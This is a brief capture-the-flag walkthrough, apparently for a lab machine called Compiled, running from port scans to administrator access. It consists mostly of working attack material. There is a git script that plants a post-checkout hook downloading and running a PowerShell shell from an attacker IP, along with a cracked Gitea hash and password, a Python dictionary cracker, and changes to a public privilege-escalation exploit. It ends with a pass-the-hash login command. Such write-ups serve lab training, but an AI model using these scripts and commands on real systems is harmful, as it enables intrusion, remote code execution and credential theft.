scan

> TARGET=10.10.11.26 && nmap -p -sC -sV -Pn -vvv  -oN nmap_tcp_all_10.10.11.26.nmap
PORT     STATE SERVICE    REASON          VERSION
3000/tcp open  ppp?       syn-ack ttl 127
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=60e0d72f09805f61; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=iqXBYYObp5IQVb5gov_80slhSOw6MTcyMjgwNjY3MDM5NTEwMTEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 04 Aug 2024 21:24:30 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=881bfc2361ac266e; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=4PF8_KZGVdhD8e83H7-I6DN-4GY6MTcyMjgwNjY3NTY0MzkyNjIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 04 Aug 2024 21:24:35 GMT
|_    Content-Length: 0
5000/tcp open  upnp?      syn-ack ttl 127
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Sun, 04 Aug 2024 21:24:30 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|     <!-- Bootstrap CSS -->
|     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|     <!-- Custom CSS -->
|     <style>
|     your custom CSS here */
|     body {
|     font-family: 'Ubuntu Mono', monospace;
|     background-color: #272822;
|     color: #ddd;
|     .jumbotron {
|     background-color: #1e1e1e;
|     color: #fff;
|     padding: 100px 20px;
|     margin-bottom: 0;
|     .services {
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http       syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub? syn-ack ttl 127

web enum

> t_web 10.10.11.26:3000
[09:28:01] Starting:
[09:28:04] 200 -    1KB - /.well-known/openid-configuration
[09:28:04] 200 -  206B  - /.well-known/security.txt
[09:28:06] 303 -   38B  - /admin  ->  /user/login
[09:28:06] 303 -   38B  - /admin/  ->  /user/login
[09:28:09] 200 -   16KB - /administrator
[09:28:09] 200 -   16KB - /administrator/
[09:28:10] 200 -  704B  - /api/swagger
[09:28:15] 303 -   41B  - /explore  ->  /explore/repos
[09:28:15] 200 -   40KB - /explore/repos
[09:28:16] 301 -   58B  - /favicon.ico  ->  /assets/img/favicon.png
[09:28:21] 303 -   38B  - /issues  ->  /user/login
[09:28:31] 200 -  297B  - /sitemap.xml
[09:28:34] 200 -   21KB - /test
[09:28:34] 200 -   21KB - /test/
[09:28:34] 200 -   21KB - /testing
[09:28:34] 200 -   21KB - /Testing
[09:28:35] 200 -   11KB - /user/login/
[09:28:36] 401 -   50B  - /v2/_catalog
[09:28:36] 401 -   50B  - /v2
[09:28:36] 401 -   50B  - /v2/

foothold

#!/bin/bash
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main
rm -rf repo1
rm -rf repo2
git clone http://gitea.compiled.htb:3000/mtest/repo1.git
cd repo1
mkdir -p y/hooks
cat > y/hooks/post-checkout <<EOF
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.91/shell.ps1')
EOF
chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..
git clone http://gitea.compiled.htb:3000/mtest/repo2.git
cd repo2
git submodule add --name x/y "http://gitea.compiled.htb:3000/mtest/repo1.git" A/modules/x
git commit -m "add-submodule"
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push
cd ..

user: emily

  • find a db file in /c/Program Files/Gitea/data gittea.db
  • Convert the hashes to base64 and crack with hashcat
sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=
> hashcat -a 0 -m 10900 hash.txt rockyou.txt
12345678

def pbkdf2_hash(password, salt, iterations=50000, dklen=50):
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',  # hashing algorithm
        password.encode('utf-8'),  # password
        salt,  # salt
        iterations,  # number of iterations
        dklen=dklen  # key length
    )
    return hash_value
def find_matching_password(dictionary_file, target_hash, salt, iterations=50000, dklen=50):

    target_hash_bytes = binascii.unhexlify(target_hash)

    with open(dictionary_file, 'r', encoding='utf-8') as file:
        for line in file:

            password = line.strip()

            # generating hash
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)

            # Check if hash is correct
            if hash_value == target_hash_bytes:
                print(f"Found password: {password}")
                return password

    print("Password not found.")
    return None

# Parameters
salt = binascii.unhexlify('227d873cca89103cd83a976bdac52486')  # Salt from gitea.db
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16' # hash from gitea.db
# Patch to dictionary
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)
  • login as emily:12345678, use runascs.exe

root

  • find VSStandardCollectorService150 and https://github.com/Wh04m1001/CVE-2024-20656
  • change cmd[] to in main.cpp:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
  • compile to get Expl.exe
  • note to start net start msiserver

post

> evil-winrm -i 10.10.11.26 -u Administrator -H f75c95bc9312632edec46b607938061e

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack